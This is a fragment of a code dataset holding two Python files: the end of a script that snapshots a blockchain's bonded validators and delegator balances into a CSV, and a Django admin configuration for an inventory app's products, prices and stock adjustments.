get_json(ENDPOINTS['validators']) if d['bond_status'] == 'bonded']\r\ndelegators = defaultdict(int)\r\n\r\nfor v in validators:\r\n for i, d in enumerate(get_json(ENDPOINTS['validator_delegations'] % v['operator_address'])['result']):\r\n delegators[d['delegator_address']] += float(d['balance']['amount'])\r\n print(f'+{i+1:4} delegator totals from {v[\"description\"][\"moniker\"]}')\r\n\r\n\r\n# Get all delegators profiles to find the last_seen time\r\n# ------------------------------------------------------------------------------\r\nwith open('delegator_info.csv', 'w') as f:\r\n writer = csv.writer(f)\r\n\r\n with ThreadPoolExecutor(max_workers=8) as executor:\r\n for row in executor.map(get_profile, delegators.items()):\r\n writer.writerow(row)\r\n print(*row)\r\n\r\n\r\n# End of process alerter and duration\r\n# ------------------------------------------------------------------------------\r\nnewTimestamp = int(time())\r\nprocessTime = newTimestamp - initTime\r\nprint('Snapshot Duration:', processTime, 'seconds')\r\nwinsound.Beep(550, 250)\r\nwinsound.Beep(650, 350)\r\n","sub_path":"CocoeoStats b0.09.py","file_name":"CocoeoStats b0.09.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"285393251","text":"from django.contrib import admin\nfrom producto.models import UnidadMedida, Categoria, Producto, PrecioVentaProducto, PrecioCompraProducto, InsercionInmediata, SustraccionInmediata\nfrom venta.models import DetalleVenta\nfrom compra.models import DetalleCompra\nfrom producto.models import Producto\nfrom producto.forms import InsercionInmediataForm, SustraccionInmediataForm, PrecioVentaProductoForm, PrecioCompraProductoForm\n\n# Register your models here.\nclass UnidadMedidaAdmin(admin.ModelAdmin):\n\tlist_display = ('nombre', 'abreviatura', )\n\tordering = ('nombre',)\n\tsearch_fields = ('nombre','abreviatura')\n\nadmin.site.register(UnidadMedida, UnidadMedidaAdmin)\n\n\nclass CategoriaAdmin(admin.ModelAdmin):\n\tlist_display = ('nombre',)\n\tordering = ('nombre',)\n\tsearch_fields = ('nombre',)\n\nadmin.site.register(Categoria, CategoriaAdmin)\n\nclass PrecioCompraProductoInline(admin.TabularInline):\n model = PrecioCompraProducto\n form = PrecioCompraProductoForm\n extra = 1\n\nclass PrecioVentaProductoInline(admin.TabularInline):\n model = PrecioVentaProducto\n form = PrecioVentaProductoForm\n extra = 1\n\nclass ProductoAdmin(admin.ModelAdmin):\n\tinlines = (PrecioCompraProductoInline, PrecioVentaProductoInline,)\n\tlist_display = ('codigo','nombre','get_cantidad', )\n\tordering = ('codigo','nombre',)\n\tsearch_fields = ('codigo','nombre')\n\tfilter_horizontal = ('proveedor',)\n\t\n\tdef get_cantidad(self, instance):\n\t\treturn instance.get_cantidad()\n\t\t\n\tget_cantidad.short_description = \"Cantidad\"\n\nadmin.site.register(Producto, ProductoAdmin)\n\n\nclass InsercionInmediataAdmin(admin.ModelAdmin):\n\tform = InsercionInmediataForm\n\tlist_display = ('producto', 'cantidad', 'observacion', 'fecha_hora', )\n\tordering = ('-fecha_hora',)\n\tsearch_fields = ('producto.codigo','producto.nombre', 'observacion',)\n\nadmin.site.register(InsercionInmediata, InsercionInmediataAdmin)\n\nclass SustraccionInmediataAdmin(admin.ModelAdmin):\n\tform = SustraccionInmediataForm\n\tlist_display = ('producto', 'cantidad', 'observacion', 'fecha_hora', )\n\tordering = ('-fecha_hora',)\n\tsearch_fields = ('producto.codigo','producto.nombre', 'observacion',)\n\nadmin.site.register(SustraccionInmediata, SustraccionInmediataAdmin)\n\n","sub_path":"producto/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}